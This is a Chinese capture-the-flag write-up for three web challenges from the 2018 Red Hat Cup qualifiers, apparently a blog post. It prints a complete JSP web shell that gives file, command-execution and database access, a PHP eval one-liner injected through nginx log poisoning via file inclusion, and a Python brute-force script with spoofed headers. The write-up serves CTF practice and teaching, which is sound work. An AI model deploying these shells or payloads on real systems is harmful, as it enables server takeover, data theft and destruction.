2018红帽杯线上预选赛wp---Web

1. simple upload

这里写图片描述
首先使用弱口令登录试试,页面没啥变化,设置代理,Burp Suite抓包

这里写图片描述
发现cookieadmin=0,将其值改为1,跳转到新页面,
这里写图片描述
这里写图片描述
编辑php一句话,保存为jpg图片上传,
这里写图片描述
在Burp Suite中修改文件名为1.php,
这里写图片描述
可以上传,但是发现并不解析
这里写图片描述
尝试了asp,aspx,jsp,发现jsp可以执行,重新上传jsp即可拿到shell。
jsp马

<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
<%!String Pwd = "aaa";

    String EC(String s, String c) throws Exception {
        return s;
    }//new String(s.getBytes("ISO-8859-1"),c);}

    Connection GC(String s) throws Exception {
        String[] x = s.trim().split("\r\n");
        Class.forName(x[0].trim()).newInstance();
        Connection c = DriverManager.getConnection(x[1].trim());
        if (x.length > 2) {
            c.setCatalog(x[2].trim());
        }
        return c;
    }

    void AA(StringBuffer sb) throws Exception {
        File r[] = File.listRoots();
        for (int i = 0; i < r.length; i++) {
            sb.append(r[i].toString().substring(0, 2));
        }
    }

    void BB(String s, StringBuffer sb) throws Exception {
        File oF = new File(s), l[] = oF.listFiles();
        String sT, sQ, sF = "";
        java.util.Date dt;
        SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
        for (int i = 0; i < l.length; i++) {
            dt = new java.util.Date(l[i].lastModified());
            sT = fm.format(dt);
            sQ = l[i].canRead() ? "R" : "";
            sQ += l[i].canWrite() ? " W" : "";
            if (l[i].isDirectory()) {
                sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length()
                        + "\t" + sQ + "\n");
            } else {
                sF += l[i].getName() + "\t" + sT + "\t" + l[i].length() + "\t"
                        + sQ + "\n";
            }
        }
        sb.append(sF);
    }

    void EE(String s) throws Exception {
        File f = new File(s);
        if (f.isDirectory()) {
            File x[] = f.listFiles();
            for (int k = 0; k < x.length; k++) {
                if (!x[k].delete()) {
                    EE(x[k].getPath());
                }
            }
        }
        f.delete();
    }

    void FF(String s, HttpServletResponse r) throws Exception {
        int n;
        byte[] b = new byte[512];
        r.reset();
        ServletOutputStream os = r.getOutputStream();
        BufferedInputStream is = new BufferedInputStream(new FileInputStream(s));
        os.write(("->" + "|").getBytes(), 0, 3);
        while ((n = is.read(b, 0, 512)) != -1) {
            os.write(b, 0, n);
        }
        os.write(("|" + "<-").getBytes(), 0, 3);
        os.close();
        is.close();
    }

    void GG(String s, String d) throws Exception {
        String h = "0123456789ABCDEF";
        int n;
        File f = new File(s);
        f.createNewFile();
        FileOutputStream os = new FileOutputStream(f);
        for (int i = 0; i < d.length(); i += 2) {
            os.write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d.charAt(i + 1))));
        }
        os.close();
    }

    void HH(String s, String d) throws Exception {
        File sf = new File(s), df = new File(d);
        if (sf.isDirectory()) {
            if (!df.exists()) {
                df.mkdir();
            }
            File z[] = sf.listFiles();
            for (int j = 0; j < z.length; j++) {
                HH(s + "/" + z[j].getName(), d + "/" + z[j].getName());
            }
        } else {
            FileInputStream is = new FileInputStream(sf);
            FileOutputStream os = new FileOutputStream(df);
            int n;
            byte[] b = new byte[512];
            while ((n = is.read(b, 0, 512)) != -1) {
                os.write(b, 0, n);
            }
            is.close();
            os.close();
        }
    }

    void II(String s, String d) throws Exception {
        File sf = new File(s), df = new File(d);
        sf.renameTo(df);
    }

    void JJ(String s) throws Exception {
        File f = new File(s);
        f.mkdir();
    }

    void KK(String s, String t) throws Exception {
        File f = new File(s);
        SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
        java.util.Date dt = fm.parse(t);
        f.setLastModified(dt.getTime());
    }

    void LL(String s, String d) throws Exception {
        URL u = new URL(s);
        int n;
        FileOutputStream os = new FileOutputStream(d);
        HttpURLConnection h = (HttpURLConnection) u.openConnection();
        InputStream is = h.getInputStream();
        byte[] b = new byte[512];
        while ((n = is.read(b, 0, 512)) != -1) {
            os.write(b, 0, n);
        }
        os.close();
        is.close();
        h.disconnect();
    }

    void MM(InputStream is, StringBuffer sb) throws Exception {
        String l;
        BufferedReader br = new BufferedReader(new InputStreamReader(is));
        while ((l = br.readLine()) != null) {
            sb.append(l + "\r\n");
        }
    }

    void NN(String s, StringBuffer sb) throws Exception {
        Connection c = GC(s);
        ResultSet r = c.getMetaData().getCatalogs();
        while (r.next()) {
            sb.append(r.getString(1) + "\t");
        }
        r.close();
        c.close();
    }

    void OO(String s, StringBuffer sb) throws Exception {
        Connection c = GC(s);
        String[] t = { "TABLE" };
        ResultSet r = c.getMetaData().getTables(null, null, "%", t);
        while (r.next()) {
            sb.append(r.getString("TABLE_NAME") + "\t");
        }
        r.close();
        c.close();
    }

    void PP(String s, StringBuffer sb) throws Exception {
        String[] x = s.trim().split("\r\n");
        Connection c = GC(s);
        Statement m = c.createStatement(1005, 1007);
        ResultSet r = m.executeQuery("select * from " + x[3]);
        ResultSetMetaData d = r.getMetaData();
        for (int i = 1; i <= d.getColumnCount(); i++) {
            sb.append(d.getColumnName(i) + " (" + d.getColumnTypeName(i)
                    + ")\t");
        }
        r.close();
        m.close();
        c.close();
    }

    void QQ(String cs, String s, String q, StringBuffer sb) throws Exception {
        int i;
        Connection c = GC(s);
        Statement m = c.createStatement(1005, 1008);
        try {
            ResultSet r = m.executeQuery(q);
            ResultSetMetaData d = r.getMetaData();
            int n = d.getColumnCount();
            for (i = 1; i <= n; i++) {
                sb.append(d.getColumnName(i) + "\t|\t");
            }
            sb.append("\r\n");
            while (r.next()) {
                for (i = 1; i <= n; i++) {
                    sb.append(EC(r.getString(i), cs) + "\t|\t");
                }
                sb.append("\r\n");
            }
            r.close();
        } catch (Exception e) {
            sb.append("Result\t|\t\r\n");
            try {
                m.executeUpdate(q);
                sb.append("Execute Successfully!\t|\t\r\n");
            } catch (Exception ee) {
                sb.append(ee.toString() + "\t|\t\r\n");
            }
        }
        m.close();
        c.close();
    }%>
<%
    String cs = request.getParameter("code") + "";
    request.setCharacterEncoding(cs);
    response.setContentType("text/html;charset=" + cs);
    //String Z = EC(request.getParameter(Pwd) + "", cs);
    if (request.getParameter(Pwd) != null) {
        String Z = EC(request.getParameter("action") + "", cs);
        String z1 = EC(request.getParameter("z1") + "", cs);
        String z2 = EC(request.getParameter("z2") + "", cs);
        StringBuffer sb = new StringBuffer("");
        try {
            sb.append("->" + "|");
            if (Z.equals("A")) {
                String s = new File(application.getRealPath(request
                        .getRequestURI())).getParent();
                sb.append(s + "\t");
                if (!s.substring(0, 1).equals("/")) {
                    AA(sb);
                }
            } else if (Z.equals("B")) {
                BB(z1, sb);
            } else if (Z.equals("C")) {
                String l = "";
                BufferedReader br = new BufferedReader(
                        new InputStreamReader(new FileInputStream(
                                new File(z1))));
                while ((l = br.readLine()) != null) {
                    sb.append(l + "\r\n");
                }
                br.close();
            } else if (Z.equals("D")) {
                BufferedWriter bw = new BufferedWriter(
                        new OutputStreamWriter(new FileOutputStream(
                                new File(z1))));
                bw.write(z2);
                bw.close();
                sb.append("1");
            } else if (Z.equals("E")) {
                EE(z1);
                sb.append("1");
            } else if (Z.equals("F")) {
                FF(z1, response);
            } else if (Z.equals("G")) {
                GG(z1, z2);
                sb.append("1");
            } else if (Z.equals("H")) {
                HH(z1, z2);
                sb.append("1");
            } else if (Z.equals("I")) {
                II(z1, z2);
                sb.append("1");
            } else if (Z.equals("J")) {
                JJ(z1);
                sb.append("1");
            } else if (Z.equals("K")) {
                KK(z1, z2);
                sb.append("1");
            } else if (Z.equals("L")) {
                LL(z1, z2);
                sb.append("1");
            } else if (Z.equals("M")) {
                String[] c = { z1.substring(2), z1.substring(0, 2), z2 };
                Process p = Runtime.getRuntime().exec(c);
                MM(p.getInputStream(), sb);
                MM(p.getErrorStream(), sb);
            } else if (Z.equals("N")) {
                NN(z1, sb);
            } else if (Z.equals("O")) {
                OO(z1, sb);
            } else if (Z.equals("P")) {
                PP(z1, sb);
            } else if (Z.equals("Q")) {
                QQ(cs, z1, z2, sb);
            }
        } catch (Exception e) {
            sb.append("ERROR" + ":// " + e.toString());
        }
        sb.append("|" + "<-");
        out.print(sb.toString());
    }
%>

保存为a.jpg上传
这里写图片描述
Burp Suite抓包改包,文件名修改为a.jsp
这里写图片描述
上传成功,得到路径
这里写图片描述
Cknife连接,在根目录发现flag文件,
这里写图片描述
打开得到flag
这里写图片描述

2. biubiubiu

这里写图片描述
用户名需要输入邮箱地址,
这里写图片描述
输入,用户:[email protected];口令:123,登录进去,
这里写图片描述
看到url
http://4292cf4a0f1f48a4bde75afb66b6c8157f7da99f231d46a1.game.ichunqiu.com/index.php?page=send.php猜测是文件读取或文件包含漏洞,进过测试不是文件读取,
目录遍历,获取敏感文件
这里写图片描述
构造错误路径,发现是nginx/1.10.3
这里写图片描述
所以接下来一般就有两个思路:
1>非预期解法(日志文件包含getshell);
2>预期解法(SSRF + GOPHER 漏洞)。
nginxd的日志文件路径一般为/var/log/nginx/access.log,这个路径一般存放在默认配置/etc/nginx/nginx.conf中,
这里写图片描述
要是觉得看起来乱,可以查看页面源代码
这里写图片描述
OK,知道了日志文件路径,接下来就是注入php一句话,
这里写图片描述
查看日志文件信息,代码被顺利执行,测试成功,
这里写图片描述
再次上传php一句话木马,地址栏输入
http://29f63f66ca80431f8bb1ed56bde24bfe99813bb7c34c4478.game.ichunqiu.com/index.php?page=../../../var/log/nginx/access.log<?php @eval($_POST['cmd']);?>
这里写图片描述
Burp Suite查看发现被转码,于是修改
这里写图片描述
蚁剑连接,打开数据库配置文件,
这里写图片描述
这里写图片描述
配置数据库,
这里写图片描述
从数据库中找到flag
这里写图片描述

3. shopping log

http://123.59.141.153/

或者 http://120.132.95.234/

hint: 不需要注入

hint2:订单号从0000开始试可能不是一个明智的选择

(本题的解题范围在题目所在服务器内,请别在其他站点做测试。)
赛题环境进不去了,只能把赛后要交的队友的wp放上来了,,,,
进去访问发现
<!-- Site is tmvb.com -->
将host改为www.tmvb.com
进去之后修改refer:www.dww.com
又遇<!-- Japan sales only -->
修改Accept-Language:ja
之后是一个订单查询系统,提示不需要注入,于是爆破订单号,
爆破脚本

#!/usr/bin/env Python 3.6.4
# -*- coding: utf-8 -*-
# @Time    : 2018/5/5 18:20
# @Author  : wkend
# @File    : BurstOrderNum.py
# @Software: PyCharm


import requests
import re
import random
import threading
import hashlib

url = "http://123.59.141.153/5a560e50e61b552d34480017c7877467info.php"
urlapi = "http://123.59.141.153/api.php?action=report"


def get_result(code):
    dic = "abcdefghijklmnopqrstuvwxyz0123456789"
    while True:
        result = ""
        result += random.choice(dic)
        result += random.choice(dic)
        result += random.choice(dic)
        result += random.choice(dic)
        result += random.choice(dic)
        result += random.choice(dic)
        result += random.choice(dic)
        result += random.choice(dic)
        result += random.choice(dic)
        m = hashlib.md5(result)
        m = m.hexdigest()
        if m[0:6] == code:
            print(result)
            break


def exhaustion():
    for a in range(9, 0, -1):
        for b in range(9, 0, -1):
            for c in range(9, 0, -1):
                for d in range(9, 0, -1):
                    headers = {
                        "Host": "www.tmvb.com",
                        "referer": "www.dww.com",
                        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0",
                        "Accept-Language": "ja",
                        "Cookie": "PHPSESSID=ke8v02bu6kcrmpp10s3v7t75m2"
                    }
                    r = requests.get(url, headers=headers).content
                    pattern = "==='(.*?)'</p>"
                    code = re.findall(pattern, r)
                    print(code)
                    code_res = get_result(code)
                    id = str(str(a) + str(b) + str(c) + str(d))
                    print(id)
                    res = {
                        "TxtTid": str(id),
                        "code": str(code_res),
                    }
                    s = requests.post(urlapi, data=res, headers=headers).content
                    if '"error":1' not in s:
                        print(s)


if __name__ == "__main__":
    exhaustion()

根据提示,从9999开始爆破,最终爆到9588,得到flag

猜你喜欢

转载自blog.csdn.net/qq_34444097/article/details/80189288